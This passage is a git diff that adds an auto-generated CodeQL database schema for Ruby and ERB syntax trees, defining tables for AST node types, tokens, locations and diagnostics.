+ruby_splat_parameter_name( + unique int ruby_splat_parameter: @ruby_splat_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_splat_parameter_def( + unique int id: @ruby_splat_parameter +); + +@ruby_string_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_string__, index] +ruby_string_child( + int ruby_string__: @ruby_string__ ref, + int index: int ref, + unique int child: @ruby_string_child_type ref +); + +ruby_string_def( + unique int id: @ruby_string__ +); + +#keyset[ruby_string_array, index] +ruby_string_array_child( + int ruby_string_array: @ruby_string_array ref, + int index: int ref, + unique int child: @ruby_bare_string ref +); + +ruby_string_array_def( + unique int id: @ruby_string_array +); + +@ruby_subshell_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_subshell, index] +ruby_subshell_child( + int ruby_subshell: @ruby_subshell ref, + int index: int ref, + unique int child: @ruby_subshell_child_type ref +); + +ruby_subshell_def( + unique int id: @ruby_subshell +); + +ruby_superclass_def( + unique int id: @ruby_superclass, + int child: @ruby_underscore_expression ref +); + +#keyset[ruby_symbol_array, index] +ruby_symbol_array_child( + int ruby_symbol_array: @ruby_symbol_array ref, + int index: int ref, + unique int child: @ruby_bare_symbol ref +); + +ruby_symbol_array_def( + unique int id: @ruby_symbol_array +); + +@ruby_then_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_then, index] +ruby_then_child( + int ruby_then: @ruby_then ref, + int index: int ref, + unique int child: @ruby_then_child_type ref +); + +ruby_then_def( + unique int id: @ruby_then +); + +@ruby_unary_operand_type = @ruby_parenthesized_statements | @ruby_underscore_expression | @ruby_underscore_simple_numeric + +case @ruby_unary.operator of + 0 = @ruby_unary_bang +| 1 = @ruby_unary_plus +| 2 = @ruby_unary_minus +| 3 = @ruby_unary_definedquestion +| 4 = @ruby_unary_not +| 5 = @ruby_unary_tilde +; + + +ruby_unary_def( + unique int id: @ruby_unary, + int operand: @ruby_unary_operand_type ref, + int operator: int ref +); + +#keyset[ruby_undef, index] +ruby_undef_child( + int ruby_undef: @ruby_undef ref, + int index: int ref, + unique int child: @ruby_underscore_method_name ref +); + +ruby_undef_def( + unique int id: @ruby_undef +); + +@ruby_unless_alternative_type = @ruby_else | @ruby_elsif + +ruby_unless_alternative( + unique int ruby_unless: @ruby_unless ref, + unique int alternative: @ruby_unless_alternative_type ref +); + +ruby_unless_consequence( + unique int ruby_unless: @ruby_unless ref, + unique int consequence: @ruby_then ref +); + +ruby_unless_def( + unique int id: @ruby_unless, + int condition: @ruby_underscore_statement ref +); + +ruby_unless_guard_def( + unique int id: @ruby_unless_guard, + int condition: @ruby_underscore_expression ref +); + +ruby_unless_modifier_def( + unique int id: @ruby_unless_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_until_def( + unique int id: @ruby_until, + int body: @ruby_do ref, + int condition: @ruby_underscore_statement ref +); + +ruby_until_modifier_def( + unique int id: @ruby_until_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +@ruby_variable_reference_pattern_name_type = @ruby_token_identifier | @ruby_underscore_nonlocal_variable + +ruby_variable_reference_pattern_def( + unique int id: @ruby_variable_reference_pattern, + int name: @ruby_variable_reference_pattern_name_type ref +); + +ruby_when_body( + unique int ruby_when: @ruby_when ref, + unique int body: @ruby_then ref +); + +#keyset[ruby_when, index] +ruby_when_pattern( + int ruby_when: @ruby_when ref, + int index: int ref, + unique int pattern: @ruby_pattern ref +); + +ruby_when_def( + unique int id: @ruby_when +); + +ruby_while_def( + unique int id: @ruby_while, + int body: @ruby_do ref, + int condition: @ruby_underscore_statement ref +); + +ruby_while_modifier_def( + unique int id: @ruby_while_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_yield_child( + unique int ruby_yield: @ruby_yield ref, + unique int child: @ruby_argument_list ref +); + +ruby_yield_def( + unique int id: @ruby_yield +); + +ruby_tokeninfo( + unique int id: @ruby_token, + int kind: int ref, + string value: string ref +); + +case @ruby_token.kind of + 0 = @ruby_reserved_word +| 1 = @ruby_token_character +| 2 = @ruby_token_class_variable +| 3 = @ruby_token_comment +| 4 = @ruby_token_constant +| 5 = @ruby_token_empty_statement +| 6 = @ruby_token_encoding +| 7 = @ruby_token_escape_sequence +| 8 = @ruby_token_false +| 9 = @ruby_token_file +| 10 = @ruby_token_float +| 11 = @ruby_token_forward_argument +| 12 = @ruby_token_forward_parameter +| 13 = @ruby_token_global_variable +| 14 = @ruby_token_hash_key_symbol +| 15 = @ruby_token_hash_splat_nil +| 16 = @ruby_token_heredoc_beginning +| 17 = @ruby_token_heredoc_content +| 18 = @ruby_token_heredoc_end +| 19 = @ruby_token_identifier +| 20 = @ruby_token_instance_variable +| 21 = @ruby_token_integer +| 22 = @ruby_token_line +| 23 = @ruby_token_nil +| 24 = @ruby_token_operator +| 25 = @ruby_token_self +| 26 = @ruby_token_simple_symbol +| 27 = @ruby_token_string_content +| 28 = @ruby_token_super +| 29 = @ruby_token_true +| 30 = @ruby_token_uninterpreted +; + + +@ruby_ast_node = @ruby_alias | @ruby_alternative_pattern | @ruby_argument_list | @ruby_array | @ruby_array_pattern | @ruby_as_pattern | @ruby_assignment | @ruby_bare_string | @ruby_bare_symbol | @ruby_begin | @ruby_begin_block | @ruby_binary | @ruby_block | @ruby_block_argument | @ruby_block_body | @ruby_block_parameter | @ruby_block_parameters | @ruby_body_statement | @ruby_break | @ruby_call | @ruby_case__ | @ruby_case_match | @ruby_chained_string | @ruby_class | @ruby_complex | @ruby_conditional | @ruby_delimited_symbol | @ruby_destructured_left_assignment | @ruby_destructured_parameter | @ruby_do | @ruby_do_block | @ruby_element_reference | @ruby_else | @ruby_elsif | @ruby_end_block | @ruby_ensure | @ruby_exception_variable | @ruby_exceptions | @ruby_expression_reference_pattern | @ruby_find_pattern | @ruby_for | @ruby_hash | @ruby_hash_pattern | @ruby_hash_splat_argument | @ruby_hash_splat_parameter | @ruby_heredoc_body | @ruby_if | @ruby_if_guard | @ruby_if_modifier | @ruby_in | @ruby_in_clause | @ruby_interpolation | @ruby_keyword_parameter | @ruby_keyword_pattern | @ruby_lambda | @ruby_lambda_parameters | @ruby_left_assignment_list | @ruby_method | @ruby_method_parameters | @ruby_module | @ruby_next | @ruby_operator_assignment | @ruby_optional_parameter | @ruby_pair | @ruby_parenthesized_pattern | @ruby_parenthesized_statements | @ruby_pattern | @ruby_program | @ruby_range | @ruby_rational | @ruby_redo | @ruby_regex | @ruby_rescue | @ruby_rescue_modifier | @ruby_rest_assignment | @ruby_retry | @ruby_return | @ruby_right_assignment_list | @ruby_scope_resolution | @ruby_setter | @ruby_singleton_class | @ruby_singleton_method | @ruby_splat_argument | @ruby_splat_parameter | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_superclass | @ruby_symbol_array | @ruby_then | @ruby_token | @ruby_unary | @ruby_undef | @ruby_unless | @ruby_unless_guard | @ruby_unless_modifier | @ruby_until | @ruby_until_modifier | @ruby_variable_reference_pattern | @ruby_when | @ruby_while | @ruby_while_modifier | @ruby_yield + +@ruby_ast_node_parent = @file | @ruby_ast_node + +#keyset[parent, parent_index] +ruby_ast_node_info( + unique int node: @ruby_ast_node ref, + int parent: @ruby_ast_node_parent ref, + int parent_index: int ref, + int loc: @location ref +); + +erb_comment_directive_child( + unique int erb_comment_directive: @erb_comment_directive ref, + unique int child: @erb_token_comment ref +); + +erb_comment_directive_def( + unique int id: @erb_comment_directive +); + +erb_directive_child( + unique int erb_directive: @erb_directive ref, + unique int child: @erb_token_code ref +); + +erb_directive_def( + unique int id: @erb_directive +); + +erb_graphql_directive_child( + unique int erb_graphql_directive: @erb_graphql_directive ref, + unique int child: @erb_token_code ref +); + +erb_graphql_directive_def( + unique int id: @erb_graphql_directive +); + +erb_output_directive_child( + unique int erb_output_directive: @erb_output_directive ref, + unique int child: @erb_token_code ref +); + +erb_output_directive_def( + unique int id: @erb_output_directive +); + +@erb_template_child_type = @erb_comment_directive | @erb_directive | @erb_graphql_directive | @erb_output_directive | @erb_token_content + +#keyset[erb_template, index] +erb_template_child( + int erb_template: @erb_template ref, + int index: int ref, + unique int child: @erb_template_child_type ref +); + +erb_template_def( + unique int id: @erb_template +); + +erb_tokeninfo( + unique int id: @erb_token, + int kind: int ref, + string value: string ref +); + +case @erb_token.kind of + 0 = @erb_reserved_word +| 1 = @erb_token_code +| 2 = @erb_token_comment +| 3 = @erb_token_content +; + + +@erb_ast_node = @erb_comment_directive | @erb_directive | @erb_graphql_directive | @erb_output_directive | @erb_template | @erb_token + +@erb_ast_node_parent = @erb_ast_node | @file + +#keyset[parent, parent_index] +erb_ast_node_info( + unique int node: @erb_ast_node ref, + int parent: @erb_ast_node_parent ref, + int parent_index: int ref, + int loc: @location ref +); + diff --git a/ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/ruby.dbscheme b/ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/ruby.dbscheme new file mode 100644 index 00000000000..307ebf14d59 --- /dev/null +++ b/ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/ruby.dbscheme @@ -0,0 +1,1443 @@ +// CodeQL database schema for Ruby +// Automatically generated from the tree-sitter grammar; do not edit + +@location = @location_default + +locations_default( + unique int id: @location_default, + int file: @file ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +sourceLocationPrefix( + string prefix: string ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +case @diagnostic.severity of + 10 = @diagnostic_debug +| 20 = @diagnostic_info +| 30 = @diagnostic_warning +| 40 = @diagnostic_error +; + + +@ruby_underscore_arg = @ruby_assignment | @ruby_binary | @ruby_conditional | @ruby_operator_assignment | @ruby_range | @ruby_unary | @ruby_underscore_primary + +@ruby_underscore_call_operator = @ruby_reserved_word + +@ruby_underscore_expression = @ruby_assignment | @ruby_binary | @ruby_break | @ruby_call | @ruby_next | @ruby_operator_assignment | @ruby_return | @ruby_unary | @ruby_underscore_arg | @ruby_yield + +@ruby_underscore_lhs = @ruby_call | @ruby_element_reference | @ruby_scope_resolution | @ruby_token_false | @ruby_token_nil | @ruby_token_true | @ruby_underscore_variable + +@ruby_underscore_method_name = @ruby_delimited_symbol | @ruby_setter | @ruby_token_constant | @ruby_token_identifier | @ruby_token_operator | @ruby_token_simple_symbol | @ruby_underscore_nonlocal_variable + +@ruby_underscore_nonlocal_variable = @ruby_token_class_variable | @ruby_token_global_variable | @ruby_token_instance_variable + +@ruby_underscore_pattern_constant = @ruby_scope_resolution | @ruby_token_constant + +@ruby_underscore_pattern_expr = @ruby_alternative_pattern | @ruby_as_pattern | @ruby_underscore_pattern_expr_basic + +@ruby_underscore_pattern_expr_basic = @ruby_array_pattern | @ruby_expression_reference_pattern | @ruby_find_pattern | @ruby_hash_pattern | @ruby_parenthesized_pattern | @ruby_range | @ruby_token_identifier | @ruby_underscore_pattern_constant | @ruby_underscore_pattern_primitive | @ruby_variable_reference_pattern + +@ruby_underscore_pattern_primitive = @ruby_delimited_symbol | @ruby_lambda | @ruby_regex | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_symbol_array | @ruby_token_encoding | @ruby_token_false | @ruby_token_file | @ruby_token_heredoc_beginning | @ruby_token_line | @ruby_token_nil | @ruby_token_self | @ruby_token_simple_symbol | @ruby_token_true | @ruby_unary | @ruby_underscore_simple_numeric + +@ruby_underscore_pattern_top_expr_body = @ruby_array_pattern | @ruby_find_pattern | @ruby_hash_pattern | @ruby_underscore_pattern_expr + +@ruby_underscore_primary = @ruby_array | @ruby_begin | @ruby_break | @ruby_call | @ruby_case__ | @ruby_case_match | @ruby_chained_string | @ruby_class | @ruby_delimited_symbol | @ruby_for | @ruby_hash | @ruby_if | @ruby_lambda | @ruby_method | @ruby_module | @ruby_next | @ruby_parenthesized_statements | @ruby_redo | @ruby_regex | @ruby_retry | @ruby_return | @ruby_singleton_class | @ruby_singleton_method | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_symbol_array | @ruby_token_character | @ruby_token_heredoc_beginning | @ruby_token_simple_symbol | @ruby_unary | @ruby_underscore_lhs | @ruby_underscore_simple_numeric | @ruby_unless | @ruby_until | @ruby_while | @ruby_yield + +@ruby_underscore_simple_numeric = @ruby_complex | @ruby_rational | @ruby_token_float | @ruby_token_integer + +@ruby_underscore_statement = @ruby_alias | @ruby_begin_block | @ruby_end_block | @ruby_if_modifier | @ruby_rescue_modifier | @ruby_undef | @ruby_underscore_expression | @ruby_unless_modifier | @ruby_until_modifier | @ruby_while_modifier + +@ruby_underscore_variable = @ruby_token_constant | @ruby_token_identifier | @ruby_token_self | @ruby_token_super | @ruby_underscore_nonlocal_variable + +ruby_alias_def( + unique int id: @ruby_alias, + int alias: @ruby_underscore_method_name ref, + int name: @ruby_underscore_method_name ref +); + +#keyset[ruby_alternative_pattern, index] +ruby_alternative_pattern_alternatives( + int ruby_alternative_pattern: @ruby_alternative_pattern ref, + int index: int ref, + unique int alternatives: @ruby_underscore_pattern_expr_basic ref +); + +ruby_alternative_pattern_def( + unique int id: @ruby_alternative_pattern +); + +@ruby_argument_list_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_argument_list, index] +ruby_argument_list_child( + int ruby_argument_list: @ruby_argument_list ref, + int index: int ref, + unique int child: @ruby_argument_list_child_type ref +); + +ruby_argument_list_def( + unique int id: @ruby_argument_list +); + +@ruby_array_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_array, index] +ruby_array_child( + int ruby_array: @ruby_array ref, + int index: int ref, + unique int child: @ruby_array_child_type ref +); + +ruby_array_def( + unique int id: @ruby_array +); + +ruby_array_pattern_class( + unique int ruby_array_pattern: @ruby_array_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_array_pattern_child_type = @ruby_splat_parameter | @ruby_underscore_pattern_expr + +#keyset[ruby_array_pattern, index] +ruby_array_pattern_child( + int ruby_array_pattern: @ruby_array_pattern ref, + int index: int ref, + unique int child: @ruby_array_pattern_child_type ref +); + +ruby_array_pattern_def( + unique int id: @ruby_array_pattern +); + +ruby_as_pattern_def( + unique int id: @ruby_as_pattern, + int name: @ruby_token_identifier ref, + int value: @ruby_underscore_pattern_expr ref +); + +@ruby_assignment_left_type = @ruby_left_assignment_list | @ruby_underscore_lhs + +@ruby_assignment_right_type = @ruby_rescue_modifier | @ruby_right_assignment_list | @ruby_splat_argument | @ruby_underscore_expression + +ruby_assignment_def( + unique int id: @ruby_assignment, + int left: @ruby_assignment_left_type ref, + int right: @ruby_assignment_right_type ref +); + +@ruby_bare_string_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_bare_string, index] +ruby_bare_string_child( + int ruby_bare_string: @ruby_bare_string ref, + int index: int ref, + unique int child: @ruby_bare_string_child_type ref +); + +ruby_bare_string_def( + unique int id: @ruby_bare_string +); + +@ruby_bare_symbol_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_bare_symbol, index] +ruby_bare_symbol_child( + int ruby_bare_symbol: @ruby_bare_symbol ref, + int index: int ref, + unique int child: @ruby_bare_symbol_child_type ref +); + +ruby_bare_symbol_def( + unique int id: @ruby_bare_symbol +); + +@ruby_begin_child_type = @ruby_else | @ruby_ensure | @ruby_rescue | @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_begin, index] +ruby_begin_child( + int ruby_begin: @ruby_begin ref, + int index: int ref, + unique int child: @ruby_begin_child_type ref +); + +ruby_begin_def( + unique int id: @ruby_begin +); + +@ruby_begin_block_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_begin_block, index] +ruby_begin_block_child( + int ruby_begin_block: @ruby_begin_block ref, + int index: int ref, + unique int child: @ruby_begin_block_child_type ref +); + +ruby_begin_block_def( + unique int id: @ruby_begin_block +); + +@ruby_binary_left_type = @ruby_underscore_expression | @ruby_underscore_simple_numeric + +case @ruby_binary.operator of + 0 = @ruby_binary_bangequal +| 1 = @ruby_binary_bangtilde +| 2 = @ruby_binary_percent +| 3 = @ruby_binary_ampersand +| 4 = @ruby_binary_ampersandampersand +| 5 = @ruby_binary_star +| 6 = @ruby_binary_starstar +| 7 = @ruby_binary_plus +| 8 = @ruby_binary_minus +| 9 = @ruby_binary_slash +| 10 = @ruby_binary_langle +| 11 = @ruby_binary_langlelangle +| 12 = @ruby_binary_langleequal +| 13 = @ruby_binary_langleequalrangle +| 14 = @ruby_binary_equalequal +| 15 = @ruby_binary_equalequalequal +| 16 = @ruby_binary_equaltilde +| 17 = @ruby_binary_rangle +| 18 = @ruby_binary_rangleequal +| 19 = @ruby_binary_ranglerangle +| 20 = @ruby_binary_caret +| 21 = @ruby_binary_and +| 22 = @ruby_binary_or +| 23 = @ruby_binary_pipe +| 24 = @ruby_binary_pipepipe +; + + +ruby_binary_def( + unique int id: @ruby_binary, + int left: @ruby_binary_left_type ref, + int operator: int ref, + int right: @ruby_underscore_expression ref +); + +ruby_block_body( + unique int ruby_block: @ruby_block ref, + unique int body: @ruby_block_body ref +); + +ruby_block_parameters( + unique int ruby_block: @ruby_block ref, + unique int parameters: @ruby_block_parameters ref +); + +ruby_block_def( + unique int id: @ruby_block +); + +ruby_block_argument_child( + unique int ruby_block_argument: @ruby_block_argument ref, + unique int child: @ruby_underscore_arg ref +); + +ruby_block_argument_def( + unique int id: @ruby_block_argument +); + +@ruby_block_body_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_block_body, index] +ruby_block_body_child( + int ruby_block_body: @ruby_block_body ref, + int index: int ref, + unique int child: @ruby_block_body_child_type ref +); + +ruby_block_body_def( + unique int id: @ruby_block_body +); + +ruby_block_parameter_name( + unique int ruby_block_parameter: @ruby_block_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_block_parameter_def( + unique int id: @ruby_block_parameter +); + +#keyset[ruby_block_parameters, index] +ruby_block_parameters_locals( + int ruby_block_parameters: @ruby_block_parameters ref, + int index: int ref, + unique int locals: @ruby_token_identifier ref +); + +@ruby_block_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_block_parameters, index] +ruby_block_parameters_child( + int ruby_block_parameters: @ruby_block_parameters ref, + int index: int ref, + unique int child: @ruby_block_parameters_child_type ref +); + +ruby_block_parameters_def( + unique int id: @ruby_block_parameters +); + +@ruby_body_statement_child_type = @ruby_else | @ruby_ensure | @ruby_rescue | @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_body_statement, index] +ruby_body_statement_child( + int ruby_body_statement: @ruby_body_statement ref, + int index: int ref, + unique int child: @ruby_body_statement_child_type ref +); + +ruby_body_statement_def( + unique int id: @ruby_body_statement +); + +ruby_break_child( + unique int ruby_break: @ruby_break ref, + unique int child: @ruby_argument_list ref +); + +ruby_break_def( + unique int id: @ruby_break +); + +ruby_call_arguments( + unique int ruby_call: @ruby_call ref, + unique int arguments: @ruby_argument_list ref +); + +@ruby_call_block_type = @ruby_block | @ruby_do_block + +ruby_call_block( + unique int ruby_call: @ruby_call ref, + unique int block: @ruby_call_block_type ref +); + +@ruby_call_method_type = @ruby_token_operator | @ruby_underscore_variable + +ruby_call_method( + unique int ruby_call: @ruby_call ref, + unique int method: @ruby_call_method_type ref +); + +ruby_call_operator( + unique int ruby_call: @ruby_call ref, + unique int operator: @ruby_underscore_call_operator ref +); + +ruby_call_receiver( + unique int ruby_call: @ruby_call ref, + unique int receiver: @ruby_underscore_primary ref +); + +ruby_call_def( + unique int id: @ruby_call +); + +ruby_case_value( + unique int ruby_case__: @ruby_case__ ref, + unique int value: @ruby_underscore_statement ref +); + +@ruby_case_child_type = @ruby_else | @ruby_when + +#keyset[ruby_case__, index] +ruby_case_child( + int ruby_case__: @ruby_case__ ref, + int index: int ref, + unique int child: @ruby_case_child_type ref +); + +ruby_case_def( + unique int id: @ruby_case__ +); + +#keyset[ruby_case_match, index] +ruby_case_match_clauses( + int ruby_case_match: @ruby_case_match ref, + int index: int ref, + unique int clauses: @ruby_in_clause ref +); + +ruby_case_match_else( + unique int ruby_case_match: @ruby_case_match ref, + unique int else: @ruby_else ref +); + +ruby_case_match_def( + unique int id: @ruby_case_match, + int value: @ruby_underscore_statement ref +); + +#keyset[ruby_chained_string, index] +ruby_chained_string_child( + int ruby_chained_string: @ruby_chained_string ref, + int index: int ref, + unique int child: @ruby_string__ ref +); + +ruby_chained_string_def( + unique int id: @ruby_chained_string +); + +ruby_class_body( + unique int ruby_class: @ruby_class ref, + unique int body: @ruby_body_statement ref +); + +@ruby_class_name_type = @ruby_scope_resolution | @ruby_token_constant + +ruby_class_superclass( + unique int ruby_class: @ruby_class ref, + unique int superclass: @ruby_superclass ref +); + +ruby_class_def( + unique int id: @ruby_class, + int name: @ruby_class_name_type ref +); + +@ruby_complex_child_type = @ruby_rational | @ruby_token_float | @ruby_token_integer + +ruby_complex_def( + unique int id: @ruby_complex, + int child: @ruby_complex_child_type ref +); + +ruby_conditional_def( + unique int id: @ruby_conditional, + int alternative: @ruby_underscore_arg ref, + int condition: @ruby_underscore_arg ref, + int consequence: @ruby_underscore_arg ref +); + +@ruby_delimited_symbol_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_delimited_symbol, index] +ruby_delimited_symbol_child( + int ruby_delimited_symbol: @ruby_delimited_symbol ref, + int index: int ref, + unique int child: @ruby_delimited_symbol_child_type ref +); + +ruby_delimited_symbol_def( + unique int id: @ruby_delimited_symbol +); + +@ruby_destructured_left_assignment_child_type = @ruby_destructured_left_assignment | @ruby_rest_assignment | @ruby_underscore_lhs + +#keyset[ruby_destructured_left_assignment, index] +ruby_destructured_left_assignment_child( + int ruby_destructured_left_assignment: @ruby_destructured_left_assignment ref, + int index: int ref, + unique int child: @ruby_destructured_left_assignment_child_type ref +); + +ruby_destructured_left_assignment_def( + unique int id: @ruby_destructured_left_assignment +); + +@ruby_destructured_parameter_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_destructured_parameter, index] +ruby_destructured_parameter_child( + int ruby_destructured_parameter: @ruby_destructured_parameter ref, + int index: int ref, + unique int child: @ruby_destructured_parameter_child_type ref +); + +ruby_destructured_parameter_def( + unique int id: @ruby_destructured_parameter +); + +@ruby_do_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_do, index] +ruby_do_child( + int ruby_do: @ruby_do ref, + int index: int ref, + unique int child: @ruby_do_child_type ref +); + +ruby_do_def( + unique int id: @ruby_do +); + +ruby_do_block_body( + unique int ruby_do_block: @ruby_do_block ref, + unique int body: @ruby_body_statement ref +); + +ruby_do_block_parameters( + unique int ruby_do_block: @ruby_do_block ref, + unique int parameters: @ruby_block_parameters ref +); + +ruby_do_block_def( + unique int id: @ruby_do_block +); + +@ruby_element_reference_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_element_reference, index] +ruby_element_reference_child( + int ruby_element_reference: @ruby_element_reference ref, + int index: int ref, + unique int child: @ruby_element_reference_child_type ref +); + +ruby_element_reference_def( + unique int id: @ruby_element_reference, + int object: @ruby_underscore_primary ref +); + +@ruby_else_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_else, index] +ruby_else_child( + int ruby_else: @ruby_else ref, + int index: int ref, + unique int child: @ruby_else_child_type ref +); + +ruby_else_def( + unique int id: @ruby_else +); + +@ruby_elsif_alternative_type = @ruby_else | @ruby_elsif + +ruby_elsif_alternative( + unique int ruby_elsif: @ruby_elsif ref, + unique int alternative: @ruby_elsif_alternative_type ref +); + +ruby_elsif_consequence( + unique int ruby_elsif: @ruby_elsif ref, + unique int consequence: @ruby_then ref +); + +ruby_elsif_def( + unique int id: @ruby_elsif, + int condition: @ruby_underscore_statement ref +); + +@ruby_end_block_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_end_block, index] +ruby_end_block_child( + int ruby_end_block: @ruby_end_block ref, + int index: int ref, + unique int child: @ruby_end_block_child_type ref +); + +ruby_end_block_def( + unique int id: @ruby_end_block +); + +@ruby_ensure_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_ensure, index] +ruby_ensure_child( + int ruby_ensure: @ruby_ensure ref, + int index: int ref, + unique int child: @ruby_ensure_child_type ref +); + +ruby_ensure_def( + unique int id: @ruby_ensure +); + +ruby_exception_variable_def( + unique int id: @ruby_exception_variable, + int child: @ruby_underscore_lhs ref +); + +@ruby_exceptions_child_type = @ruby_splat_argument | @ruby_underscore_arg + +#keyset[ruby_exceptions, index] +ruby_exceptions_child( + int ruby_exceptions: @ruby_exceptions ref, + int index: int ref, + unique int child: @ruby_exceptions_child_type ref +); + +ruby_exceptions_def( + unique int id: @ruby_exceptions +); + +ruby_expression_reference_pattern_def( + unique int id: @ruby_expression_reference_pattern, + int value: @ruby_underscore_expression ref +); + +ruby_find_pattern_class( + unique int ruby_find_pattern: @ruby_find_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_find_pattern_child_type = @ruby_splat_parameter | @ruby_underscore_pattern_expr + +#keyset[ruby_find_pattern, index] +ruby_find_pattern_child( + int ruby_find_pattern: @ruby_find_pattern ref, + int index: int ref, + unique int child: @ruby_find_pattern_child_type ref +); + +ruby_find_pattern_def( + unique int id: @ruby_find_pattern +); + +@ruby_for_pattern_type = @ruby_left_assignment_list | @ruby_underscore_lhs + +ruby_for_def( + unique int id: @ruby_for, + int body: @ruby_do ref, + int pattern: @ruby_for_pattern_type ref, + int value: @ruby_in ref +); + +@ruby_hash_child_type = @ruby_hash_splat_argument | @ruby_pair + +#keyset[ruby_hash, index] +ruby_hash_child( + int ruby_hash: @ruby_hash ref, + int index: int ref, + unique int child: @ruby_hash_child_type ref +); + +ruby_hash_def( + unique int id: @ruby_hash +); + +ruby_hash_pattern_class( + unique int ruby_hash_pattern: @ruby_hash_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_hash_pattern_child_type = @ruby_hash_splat_parameter | @ruby_keyword_pattern | @ruby_token_hash_splat_nil + +#keyset[ruby_hash_pattern, index] +ruby_hash_pattern_child( + int ruby_hash_pattern: @ruby_hash_pattern ref, + int index: int ref, + unique int child: @ruby_hash_pattern_child_type ref +); + +ruby_hash_pattern_def( + unique int id: @ruby_hash_pattern +); + +ruby_hash_splat_argument_child( + unique int ruby_hash_splat_argument: @ruby_hash_splat_argument ref, + unique int child: @ruby_underscore_arg ref +); + +ruby_hash_splat_argument_def( + unique int id: @ruby_hash_splat_argument +); + +ruby_hash_splat_parameter_name( + unique int ruby_hash_splat_parameter: @ruby_hash_splat_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_hash_splat_parameter_def( + unique int id: @ruby_hash_splat_parameter +); + +@ruby_heredoc_body_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_heredoc_content | @ruby_token_heredoc_end + +#keyset[ruby_heredoc_body, index] +ruby_heredoc_body_child( + int ruby_heredoc_body: @ruby_heredoc_body ref, + int index: int ref, + unique int child: @ruby_heredoc_body_child_type ref +); + +ruby_heredoc_body_def( + unique int id: @ruby_heredoc_body +); + +@ruby_if_alternative_type = @ruby_else | @ruby_elsif + +ruby_if_alternative( + unique int ruby_if: @ruby_if ref, + unique int alternative: @ruby_if_alternative_type ref +); + +ruby_if_consequence( + unique int ruby_if: @ruby_if ref, + unique int consequence: @ruby_then ref +); + +ruby_if_def( + unique int id: @ruby_if, + int condition: @ruby_underscore_statement ref +); + +ruby_if_guard_def( + unique int id: @ruby_if_guard, + int condition: @ruby_underscore_expression ref +); + +ruby_if_modifier_def( + unique int id: @ruby_if_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_in_def( + unique int id: @ruby_in, + int child: @ruby_underscore_arg ref +); + +ruby_in_clause_body( + unique int ruby_in_clause: @ruby_in_clause ref, + unique int body: @ruby_then ref +); + +@ruby_in_clause_guard_type = @ruby_if_guard | @ruby_unless_guard + +ruby_in_clause_guard( + unique int ruby_in_clause: @ruby_in_clause ref, + unique int guard: @ruby_in_clause_guard_type ref +); + +ruby_in_clause_def( + unique int id: @ruby_in_clause, + int pattern: @ruby_underscore_pattern_top_expr_body ref +); + +@ruby_interpolation_child_type = @ruby_token_empty_statement | @ruby_underscore_nonlocal_variable | @ruby_underscore_statement + +#keyset[ruby_interpolation, index] +ruby_interpolation_child( + int ruby_interpolation: @ruby_interpolation ref, + int index: int ref, + unique int child: @ruby_interpolation_child_type ref +); + +ruby_interpolation_def( + unique int id: @ruby_interpolation 